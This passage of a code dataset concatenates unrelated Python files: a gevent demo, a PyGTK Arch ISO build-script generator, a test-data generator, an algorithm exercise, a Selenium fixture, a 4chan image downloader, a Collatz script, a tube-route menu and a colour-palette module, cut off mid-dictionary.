\n File Name: monkey.py \n Description : \n Author : flyskywen \n date: 18-10-31 \n------------------------------------------------- \n Change Activity: \n 18-10-31: \n------------------------------------------------- \n\"\"\"\n__author__ = 'flyskywen'\n\nfrom gevent import monkey;monkey.patch_all()\nimport gevent\nimport threading\nimport time\n\n\n# Monkey patch: patches all blocking operations imported after this point in one go\n# Monkey patch: it uses different threads!!!\n# Actually it uses virtual threads; everything still runs within the same thread\n\n\ndef func1():\n print('\\033[31;1mplay start\\033[0m %s' % threading.currentThread())\n # time.sleep() is wrapped into a non-blocking operation\n time.sleep(3)\n print('\\033[31;1mplay end\\033[0m')\n\n\ndef func2():\n print('\\033[32;1meat start\\033[0m %s' % threading.currentThread())\n time.sleep(1)\n print('\\033[32;1meat end\\033[0m')\n\n\n# Achieves concurrent execution of func1 and func2\ngevent.joinall([\n 
gevent.spawn(func1),\n gevent.spawn(func2),\n # gevent.spawn(func3),\n])\n\nprint(threading.current_thread())\n","sub_path":"PyCharm_workspace/FullStack/Without_django/Gevent/monkey.py","file_name":"monkey.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90028984","text":"#!/usr/bin/python2\n\nimport os\n\nimport pygtk\npygtk.require('2.0')\n\nimport gtk\nimport gtk.glade\n\nclass ArchBuild:\n\tdef __init__(self):\n\t\t# ===================== builder section =====================\n\n\t\t# gui builder from ui glade file\n\t\tguibuilder=gtk.Builder()\n\t\tif os.path.exists(\"/usr/share/achmadi-iso/archbuild.glade\"):\n\t\t\tguibuilder.add_from_file(\"/usr/share/achmadi-iso/archbuild.glade\")\n\t\telse:\n\t\t\tguibuilder.add_from_file(\"./archbuild.glade\")\n\t\tguibuilder.connect_signals(self)\n\n\t\t# window\n\t\twindow=guibuilder.get_object(\"wndwArchBuild\")\n\t\twindow.connect(\"destroy\",self.on_destroy)\n\n\t\t# architecture\n\t\tself.rbtArch32=guibuilder.get_object(\"rbtArch32\")\n\t\tself.rbtArch64=guibuilder.get_object(\"rbtArch64\")\n\n\t\t# working directory\n\t\tself.txtWorkDir=guibuilder.get_object(\"txtWorkDir\")\n\t\tself.btnWorkDir=guibuilder.get_object(\"btnWorkDir\")\n\n\t\t# iso file output\n\t\tself.txtIsoFile=guibuilder.get_object(\"txtIsoFile\")\n\n\t\t# user and host\n\t\tself.txtUser=guibuilder.get_object(\"txtUser\")\n\t\tself.txtHost=guibuilder.get_object(\"txtHost\")\n\n\t\t# pacman config\n\t\tself.txtPacConf=guibuilder.get_object(\"txtPacConf\")\n\t\tself.btnPacOpen=guibuilder.get_object(\"btnPacOpen\")\n\n\t\t# database directory\n\t\tself.txtDbDir=guibuilder.get_object(\"txtDbDir\")\n\t\tself.btnDbDir=guibuilder.get_object(\"btnDbDir\")\n\n\t\t# package list\n\t\tself.txtPkgRepo=guibuilder.get_object(\"txtPkgRepo\")\n\t\tself.btnPkgRepo=guibuilder.get_object(\"btnPkgRepo\")\n\t\tself.txtPkgBuild=guibuilder.get_object(\"txtPkgBuild\")\n\t\tself.btnPkgBuild=guibuilder.get_object(\"btnPkgBuild\")\n\t\tself.txtPkgBuildDep=guibuilder.get_object(\"txtPkgBuildDep\")\n\t\tself.btnPkgBuildDep=guibuilder.get_object(\"btnPkgBuildDep\")\n\n\t\t# base iso file\n\t\tself.txtBaseIso=guibuilder.get_object(\"txtBaseIso\")\n\t\tself.btnBaseIso=guibuilder.get_object(\"btnBaseIso\")\n\n\t\t# package directory\n\t\tself.txtPkgDirRepo=guibuilder.get_object(\"txtPkgDirRepo\")\n\t\tself.btnPkgDirRepo=guibuilder.get_object(\"btnPkgDirRepo\")\n\t\tself.txtPkgDirBuild=guibuilder.get_object(\"txtPkgDirBuild\")\n\t\tself.btnPkgDirBuild=guibuilder.get_object(\"btnPkgDirBuild\")\n\n\t\t# configuration script\n\t\tself.txtConfScript=guibuilder.get_object(\"txtConfScript\")\n\t\tself.btnConfScript=guibuilder.get_object(\"btnConfScript\")\n\n\t\t# command\n\t\tself.btnGenerate=guibuilder.get_object(\"btnGenerate\")\n\n\t\t# ===================== default section =====================\n\n\t\t# ===================== connect section =====================\n\n\t\t# working directory\n\t\tself.btnWorkDir.connect(\"clicked\",self.on_work_dir_open)\n\n\t\t# pacman config\n\t\tself.btnPacOpen.connect(\"clicked\",self.on_pac_conf_open)\n\n\t\t# database directory\n\t\tself.btnDbDir.connect(\"clicked\",self.on_db_dir_open)\n\n\t\t# package list\n\t\tself.btnPkgRepo.connect(\"clicked\",self.on_pkg_repo_open)\n\t\tself.btnPkgBuild.connect(\"clicked\",self.on_pkg_build_open)\n\t\tself.btnPkgBuildDep.connect(\"clicked\",self.on_pkg_builddep_open)\n\n\t\t# base iso 
file\n\t\tself.btnBaseIso.connect(\"clicked\",self.on_base_iso_open)\n\n\t\t# package directory\n\t\tself.btnPkgDirRepo.connect(\"clicked\",self.on_pkgdir_repo_open)\n\t\tself.btnPkgDirBuild.connect(\"clicked\",self.on_pkgdir_build_open)\n\n\t\t# configuration script\n\t\tself.btnConfScript.connect(\"clicked\",self.on_conf_script_open)\n\n\t\t# command\n\t\tself.btnGenerate.connect(\"clicked\",self.on_generate_script)\n\n\t\t# ===================== app section =====================\n\n\t\twindow.show()\n\n\tdef on_destroy(self, widget):\n\t\tgtk.main_quit()\n\n\t\t# ===================== widget routine section =====================\n\n\t# working directory\n\tdef on_work_dir_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Working Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtWorkDir.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# pacman config\n\tdef on_pac_conf_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select custom Pacman config file\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.conf\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPacConf.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# database directory\n\tdef on_db_dir_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Database Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtDbDir.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# package list\n\tdef on_pkg_repo_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Repository Package List\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.txt\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgRepo.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\tdef on_pkg_build_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Builded Package List\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.txt\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgBuild.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\tdef on_pkg_builddep_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Builded Dependencies Package List\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Text 
File\")\n\t\tfile_filter.add_mime_type(\"text/plain\")\n\t\tfile_filter.add_pattern(\"*.txt\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgBuildDep.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# base iso file\n\tdef on_base_iso_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Arch Linux ISO\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"ISO File\")\n\t\tfile_filter.add_mime_type(\"application/x-cd-image\")\n\t\tfile_filter.add_pattern(\"*.iso\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtBaseIso.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# package directory\n\tdef on_pkgdir_repo_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Repository Package Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgDirRepo.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\tdef on_pkgdir_build_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Build Package Directory\",None, gtk.FILE_CHOOSER_ACTION_SELECT_FOLDER,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtPkgDirBuild.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# configuration script\n\tdef on_conf_script_open(self,widget):\n\t\tdialog = gtk.FileChooserDialog(\"Select Shell Script\",None, gtk.FILE_CHOOSER_ACTION_OPEN,(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN, gtk.RESPONSE_OK))\n\t\tfile_filter = gtk.FileFilter()\n\t\tfile_filter.set_name(\"Shell Script\")\n\t\tfile_filter.add_mime_type(\"application/x-shellscript\")\n\t\tdialog.add_filter(file_filter)\n\t\tresponse = dialog.run()\n\t\tif response == gtk.RESPONSE_OK:\n\t\t\tself.txtConfScript.set_text(dialog.get_filename())\n\t\tdialog.destroy()\n\n\t# command\n\tdef on_generate_script(self,widget):\n\n\t\t# ===================== build variables =====================\n\n\t\tv_work_dir = self.txtWorkDir.get_text()\n\t\tv_target_iso_name = self.txtIsoFile.get_text()\n\t\tv_target_username = self.txtUser.get_text()\n\t\tv_target_hostname = self.txtHost.get_text()\n\t\tv_pacman_conf = self.txtPacConf.get_text()\n\t\tv_repo_pkg_list = self.txtPkgRepo.get_text()\n\n\t\tif self.txtPkgBuild.get_text_length() == 0 and self.txtPkgBuildDep.get_text_length() == 0:\n\t\t\tv_build_pkg_list = \"none\"\n\t\t\tv_builddep_pkg_list = \"none\"\n\t\t\tv_build_pkg_src = \"none\"\n\t\telse:\n\t\t\tif self.txtPkgDirBuild.get_text_length() == 0:\n\t\t\t\tmd = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_ERROR, gtk.BUTTONS_CLOSE, \"Build or BuildDeps Package List was set but Directory was empty\")\n\t\t\t\tmd.run()\n\t\t\t\tmd.destroy()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tv_build_pkg_src = self.txtPkgDirBuild.get_text()\n\n\t\t\t\tif self.txtPkgBuild.get_text_length() == 0:\n\t\t\t\t\tv_build_pkg_list = \"none\"\n\t\t\t\telse:\n\t\t\t\t\tv_build_pkg_list = self.txtPkgBuild.get_text()\n\n\t\t\t\tif self.txtPkgBuildDep.get_text_length() == 0:\n\t\t\t\t\tv_builddep_pkg_list = \"none\"\n\t\t\t\telse:\n\t\t\t\t\tv_builddep_pkg_list = self.txtPkgBuildDep.get_text()\n\n\t\tv_arch_iso_src = self.txtBaseIso.get_text()\n\t\tv_db_src = self.txtDbDir.get_text()\n\t\tv_repo_pkg_src = self.txtPkgDirRepo.get_text()\n\n\t\tif self.txtConfScript.get_text_length() == 0:\n\t\t\tv_conf_script = \"none\"\n\t\telse:\n\t\t\tv_conf_script = self.txtConfScript.get_text()\n\n\t\t# ===================== create script strings =====================\n\n\t\tout_script = \"#!/bin/bash \\n\"\n\t\tout_script += \"\\n\"\n\n\t\tif self.rbtArch64.get_active():\n\t\t\tout_script += \"sudo achmadi64 \\\\\\n\"\n\t\t\tout_script += \"$USER \\\\\\n\"\n\n\t\tif self.rbtArch32.get_active():\n\t\t\tout_script += \"sudo achmadi32 \\\\\\n\"\n\t\t\tout_script += \"$USER \\\\\\n\"\n\n\t\tout_script += \"%s \\\\\\n\" % v_work_dir\n\t\tout_script += \"%s \\\\\\n\" % v_target_iso_name\n\t\tout_script += \"%s \\\\\\n\" % v_target_username\n\t\tout_script += \"%s \\\\\\n\" % v_target_hostname\n\t\tout_script += \"%s \\\\\\n\" % v_pacman_conf\n\t\tout_script += \"%s \\\\\\n\" % v_repo_pkg_list\n\t\tout_script += \"%s \\\\\\n\" % v_build_pkg_list\n\t\tout_script += \"%s \\\\\\n\" % v_builddep_pkg_list\n\t\tout_script += \"%s \\\\\\n\" % v_arch_iso_src\n\t\tout_script += \"%s \\\\\\n\" % v_db_src\n\t\tout_script += \"%s \\\\\\n\" % v_repo_pkg_src\n\t\tout_script += \"%s \\\\\\n\" % v_build_pkg_src\n\t\tout_script += \"%s\"\t\t% v_conf_script\n\n\t\t# ===================== write script =====================\n\n\t\tif self.rbtArch64.get_active():\n\t\t\tfile_script = v_work_dir + \"/build64\"\n\t\t\tout_script += \" 2>&1 | tee build64_log.txt\"\n\n\t\tif self.rbtArch32.get_active():\n\t\t\tfile_script = v_work_dir + \"/build32\"\n\t\t\tout_script += \" 2>&1 | tee build32_log.txt\"\n\n\t\ttxt_script = open(file_script, \"w\")\n\t\ttxt_script.write(out_script)\n\t\ttxt_script.close()\n\t\tos.system(\"chmod a+x %s\" % file_script)\n\n\t\tmsg = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_INFO,gtk.BUTTONS_OK, \"Script %s generated.\\n\\nPlease double check before running the generated script\" % file_script)\n\t\tmsg.run()\n\t\tmsg.destroy()\n\n# ===================== final section =====================\n\nif __name__ == \"__main__\":\n\tapp = ArchBuild()\n\tgtk.main()\n","sub_path":"gui/archbuild.py","file_name":"archbuild.py","file_ext":"py","file_size_in_byte":11223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50567209","text":"#!/usr/bin/python3\nfrom cyaron import IO, randint, ati\n\nN = ati([10] * 2 + [3000] * 2 + [1e7] * 6 + [1e10] * 10)\n\nfor t in range(20):\n data = IO(file_prefix='', data_id=t + 1)\n\n T = randint(90, 100)\n data.input_writeln(T)\n for i in range(T):\n if randint(0, 1):\n diff = randint(0, min(randint(0, 10) * 10, N[t] - 1))\n l = randint(1, N[t] - diff)\n r = l + diff\n else:\n l = randint(1, N[t])\n r = randint(l, N[t])\n \n if N[t] == int(1e7):\n r = min(l + int(1e5), r)\n \n if randint(0, 1):\n k = randint(1, 5)\n else:\n k = randint(1, 1000)\n\n data.input_writeln(l, r, k)\n data.output_gen('./c')\n data.close()\n","sub_path":"Online Judges/Nowcoder/[Upload]Contest TG/C Bunny 的函数/data/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197554625","text":"# Quite ingenious; a brain-teaser type problem\ndef increasingTriplet(nums):\n first = second = float('inf')\n for n in nums:\n if n <= first:\n first = n\n elif n <= second:\n second = n\n else:\n return True\n return 
False\n\n\ntest_nums = [1, 6, 3, 4, 2]\nprint(increasingTriplet(test_nums))","sub_path":"334_IncreasingTripletSubsequence.py","file_name":"334_IncreasingTripletSubsequence.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"118259197","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom Config.config import SetupConfiguration as scd\r\n\r\n@pytest.fixture(params=['firefox'], scope ='function')\r\ndef init_driver(request):\r\n if request.param == 'firefox':\r\n driver = webdriver.Firefox(executable_path=scd.FireFoxInstance)\r\n# if request.param == 'Chrome':\r\n# driver = webdriver.Chrome(executable_path=r'C:\\\\Users\\\\612563313\\\\BTFleet_2020\\\\1.Auto_Fleet\\\\sel_driver\\\\geckodriver-v0.24.0-win64\\\\geckodriver.exe')\r\n# if request.param == 'ie':\r\n# driver = webdriver.Firefox(executable_path=r'C:\\\\Users\\\\612563313\\\\BTFleet_2020\\\\1.Auto_Fleet\\\\sel_driver\\\\geckodriver-v0.24.0-win64\\\\geckodriver.exe')\r\n driver.delete_all_cookies()\r\n driver.get(scd.base_URL)\r\n driver.maximize_window() \r\n request.cls.driver = driver\r\n# yield \r\n# driver.close()\r\n\r\n# #######################Generate HTML report #######################################################\r\n# def pytest_configure(config):\r\n# config._metdata['Project Name']:'Fleet Portal'\r\n# \r\n# @pytest.mark.optionalhook\r\n# def pytest_metadata(metadata):\r\n# metadata.pop(\"JAVA Home\", None)\r\n# metadata.pop(\"Plugins\", None)\r\n\r\n\r\n ","sub_path":"com.myportaltest.rivusfleet/AppTests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"599130367","text":"from time import sleep\nfrom graph.GraphHandler import GraphHandler\n\n\nclass UI:\n\n def mainMenu(self):\n invalidOption = True\n selectedOption = None\n\n while invalidOption:\n print(\"\\t*** Heuristic search in the London tube ***\\n\")\n print(\"Please select an option.\")\n print(\"[1] Search the route between two stations\")\n print(\"[2] exit\")\n try:\n selectedOption = int(input(\"Option: \"))\n print(\"\")\n except:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n if selectedOption > 2 or selectedOption < 1:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n invalidOption = False\n\n return selectedOption\n\n def getStation(self, stage=\"start\"):\n\n invalidStation = True\n selectedStation = None\n graph = GraphHandler()\n\n while invalidStation:\n selectedStation = input(f'Please specify the {stage} station: ')\n\n if not graph.validStation(selectedStation):\n print('Please enter a valid station name.')\n continue\n\n invalidStation = False\n\n selectedStation = graph.getStationsData(selectedStation)\n\n return selectedStation\n\n def getSearchStrategy(self):\n\n invalidSearchStrat = True\n selectedSearchStrat = None\n\n while invalidSearchStrat:\n print(\"Please specify the search strategy that's going to be used.\")\n print(\"[1] Depth-first\")\n print(\"[2] Breadth-first\")\n try:\n selectedSearchStrat = int(input(\"Option: \"))\n print(\"\")\n except:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n if selectedSearchStrat > 2 or selectedSearchStrat < 1:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n invalidSearchStrat = False\n\n return selectedSearchStrat\n\n def getSearchPriority(self):\n\n invalidSearchPriority = True\n 
selectedSearchPriority = None\n\n while invalidSearchPriority:\n print(\"Please specify the parameter that's going to be prioritized.\")\n print(\"[1] Distance\")\n print(\"[2] Time\")\n try:\n selectedSearchPriority = int(input(\"Option: \"))\n print(\"\")\n except:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n if selectedSearchPriority > 2 or selectedSearchPriority < 1:\n print(\"Invalid option selected.\")\n sleep(2)\n continue\n\n invalidSearchPriority = False\n\n return selectedSearchPriority\n","sub_path":"search/heuristic_search/UserInterface.py","file_name":"UserInterface.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418828314","text":"#! python3\r\n# oneechan-downloader.py, a simple script to download all images found in a given 4chan thread\r\n# usage: oneechan-downloader.py [url] OR simply call oneechan-downloader.py with no args to use url in clipboard\r\n\r\nimport sys\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom pyperclip import paste\r\nfrom os import makedirs, path\r\n\r\n# check if url arg was given, otherwise use clipboard\r\nif len(sys.argv) > 1:\r\n url = ' '.join(sys.argv[1:])\r\nelse:\r\n url = paste()\r\n\r\n\r\n# pulls thread link from html. this bypasses any issues with 4chanX reformatting or link shortening\r\ndef get_thread():\r\n thread = str(soup.select(\"[rel='canonical']\"))[12:-19]\r\n return thread\r\n\r\n\r\n# create destination folder\r\ndef url_to_dir(url):\r\n thread = url.split('/')\r\n board = thread[3]\r\n thread_num = thread[-2]\r\n dir = f'./{board}/{thread_num}/'\r\n makedirs(dir, exist_ok=True)\r\n return dir\r\n\r\n\r\ndef get_image_links():\r\n image_list = []\r\n raw_links = soup.select('.fileText a')\r\n for item in raw_links:\r\n # removes html formatting and creates a list with just links\r\n image_list.append(str(item).split('\"')[1][2:])\r\n return image_list\r\n\r\n\r\ndef download_files(file_list):\r\n count = 0\r\n for image in file_list:\r\n count += 1\r\n print(f'Downloading image {count} of {len(file_list)}')\r\n res = requests.get(f'http://{image}')\r\n filename = path.basename(image)\r\n current_file = open(destination + filename, 'wb')\r\n for chunk in res.iter_content(100000):\r\n current_file.write(chunk)\r\n current_file.close()\r\n\r\n\r\nprint(f'Loading thread {url}...')\r\n\r\ntry:\r\n r = requests.get(url)\r\n r.raise_for_status()\r\nexcept requests.exceptions.HTTPError as err:\r\n sys.exit(err)\r\n\r\nsoup = BeautifulSoup(r.text, 'html.parser')\r\nthread = get_thread()\r\ndestination = url_to_dir(thread)\r\nfile_list = get_image_links()\r\nprint(f'{len(file_list)} images found.')\r\ndownload_files(file_list)\r\nprint(f'Completed successfully. 
Images saved to {destination}')\r\ninput('Press enter to exit')\r\n","sub_path":"oneechan-downloader.py","file_name":"oneechan-downloader.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"143835082","text":"def collatz(number):\n\tlength = 0\n\twhile number > 1:\n\t\tlength += 1\n\t\tif number % 2 == 0:\n\t\t\tnumber //= 2\n\t\telse:\n\t\t\tnumber *= 3\n\t\t\tnumber += 1\n\treturn length\n\nlongestchain = 0\nbeststart = 0\n\nfor x in range(1, 1000001):\n\tprint(x)\n\tl = collatz(x)\n\tif l > longestchain:\n\t\tlongestchain = l\n\t\tbeststart = x\n\nprint(beststart)\n","sub_path":"Python/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"323135661","text":"# List of Web Colors (HTML Compatible) in RGB\n# Reference: https://en.wikipedia.org/wiki/Web_colors\n# Importing Shorthand: import pylette_web as clr\nimport colorsys\n\n\ndef rgb2hsv(rgbcolor): # rgbcolor is tuple\n \"\"\"Takes an (r, g, b) tuple and uses Python's colorsys module to convert it to the hsv colorspace.\nReturns a (h, s, v) tuple\"\"\"\n try:\n r, g, b = rgbcolor\n r /= 255\n g /= 255\n b /= 255\n h, s, v = colorsys.rgb_to_hsv(r, g, b)\n h = round(h, 3)\n s = round(s, 3)\n v = round(v, 3)\n return (h, s, v)\n except ValueError:\n print(\"ERROR: expected (r, g, b) tuple, got {} instead.\".format(rgbcolor))\n\n\ndef hsv2rgb(hsvcolor): # hsvcolor is a tuple\n \"\"\"Takes a (h, s, v) tuple and uses Python's colorsys module to convert it to the rgb colorspace.\nReturns an (r, g, b) tuple\"\"\"\n try:\n h, s, v = hsvcolor\n r, g, b = colorsys.hsv_to_rgb(h, s, v)\n r = round(r * 255)\n g = round(g * 255)\n b = round(b * 255)\n return (r, g, b)\n except ValueError:\n print(\"ERROR: expected (h, s, v) tuple, got {} instead.\".format(hsvcolor))\n\n\ndef rgb2hex(rgbcolor): # rgbcolor is a tuple\n \"\"\"Takes an (r, g, b) tuple and converts it to Hex.\nReturns a hex string.\"\"\"\n try:\n r, g, b = rgbcolor\n def rgbverify(x): return max(0, min(x, 255))\n return \"#{:02x}{:02x}{:02x}\".format(rgbverify(r), rgbverify(g), rgbverify(b))\n except ValueError:\n print(\"ERROR: expected (r, g, b) tuple, got {} instead.\".format(rgbcolor))\n return None\n\n\ndef hex2rgb(hex): # hex is a string\n \"\"\"Takes a hex string and converts it to rgb.\nReturns an (r, g, b) tuple.\"\"\"\n if len(hex) == 7:\n r = int(hex[1:3], 16)\n g = int(hex[3:5], 16)\n b = int(hex[5:7], 16)\n def rgbverify(x): return max(0, min(x, 255))\n return (rgbverify(r), rgbverify(g), rgbverify(b))\n else:\n print(\"Expected String of Length 7: #XXXXXX, got {} instead\".format(hex))\n\n\ndef transparent(rgbcolor, alpha): # alpha is between 0 and 255\n \"\"\"Takes an (r, g, b) tuple and alpha (between 0 and 255).\nReturns a (r, g, b, a) tuple for transparent/translucent colors.\"\"\"\n try:\n r, g, b = rgbcolor\n a = (lambda x: max(0, min(x, 255)))(alpha)\n return (r, g, b, a)\n except ValueError:\n print(\"ERROR: expected (r, g, b) tuple, got {} instead.\".format(rgbcolor))\n\n\n# Pink Colors:\nPink = (255, 192, 203)\nLightPink = (255, 182, 193)\nHotPink = (255, 105, 180)\nDeepPink = (255, 20, 147)\nPaleVioletRed = (219, 112, 147)\nMediumVioletRed = (199, 21, 133)\nlist_pink = {\n \"Pink\": Pink,\n \"LightPink\": LightPink,\n \"HotPink\": HotPink,\n \"DeepPink\": DeepPink,\n \"PaleVioletRed\": PaleVioletRed,\n \"MediumVioletRed\": MediumVioletRed\n}\n\n# Red Colors:\nLightSalmon = (255, 160, 122)\nSalmon = (250, 128, 114)\nDarkSalmon = (233, 150, 122)\nLightCoral = (240, 128, 128)\nIndianRed = (205, 92, 92)\nCrimson = (220, 20, 60)\nFirebrick = (178, 34, 34)\nDarkRed = (139, 0, 0)\nRed = (255, 0, 0)\nlist_red = {\n \"LightSalmon\": LightSalmon,\n \"Salmon\": Salmon,\n \"DarkSalmon\": DarkSalmon,\n \"LightCoral\": LightCoral,\n \"IndianRed\": IndianRed,\n \"Crimson\": Crimson,\n \"Firebrick\": Firebrick,\n \"DarkRed\": DarkRed,\n \"Red\": Red\n}\n\n# Orange Colors:\nOrangeRed = (255, 69, 0)\nTomato = (255, 99, 71)\nCoral = (255, 127, 80)\nDarkOrange = (255, 140, 0)\nOrange = (255, 165, 0)\nlist_orange = {\n \"OrangeRed\": OrangeRed,\n \"Tomato\": Tomato,\n \"Coral\": Coral,\n \"DarkOrange\": DarkOrange,\n \"Orange\": Orange\n}\n\n# Yellow Colors:\nYellow = (255, 255, 0)\nLightYellow = (255, 255, 224)\nLemonChiffon = (255, 250, 205)\nLightGoldenrodYellow = (250, 250, 210)\nPapayaWhip = (255, 239, 213)\nMoccasin = (255, 228, 181)\nPeachPuff = (255, 218, 185)\nPaleGoldenrod = (238, 232, 170)\nKhaki = (240, 230, 140)\nDarkKhaki = (189, 183, 107)\nGold = (255, 215, 0)\nlist_yellow = {\n \"Yellow\": Yellow,\n \"LightYellow\": LightYellow,\n \"LemonChiffon\": LemonChiffon,\n \"LightGoldenrodYellow\": LightGoldenrodYellow,\n \"PapayaWhip\": PapayaWhip,\n \"Moccasin\": Moccasin,\n \"PeachPuff\": PeachPuff,\n \"PaleGoldenrod\": PaleGoldenrod,\n \"Khaki\": Khaki,\n \"DarkKhaki\": DarkKhaki,\n \"Gold\": Gold\n}\n\n# Brown Colors:\nCornsilk = (255, 248, 220)\nBlanchedAlmond = (255, 235, 205)\nBisque = (255, 228, 196)\nNavajoWhite = (255, 222, 173)\nWheat = (245, 222, 179)\nBurlywood = (222, 184, 135)\nTan = (210, 180, 140)\nRosyBrown = (188, 143, 143)\nSandyBrown = (244, 164, 96)\nGoldenrod = (218, 165, 32)\nDarkGoldenrod = (184, 134, 11)\nPeru = (205, 133, 63)\nChocolate = (210, 105, 30)\nSaddleBrown = (139, 69, 19)\nSienna = (160, 82, 45)\nBrown = (165, 42, 42)\nMaroon = (128, 0, 0)\nlist_brown = {\n \"Cornsilk\": Cornsilk,\n \"BlanchedAlmond\": BlanchedAlmond,\n \"Bisque\": Bisque,\n \"NavajoWhite\": NavajoWhite,\n \"Wheat\": Wheat,\n \"Burlywood\": Burlywood,\n \"Tan\": Tan,\n \"RosyBrown\": RosyBrown,\n \"SandyBrown\": SandyBrown,\n \"Goldenrod\": Goldenrod,\n \"DarkGoldenrod\": DarkGoldenrod,\n 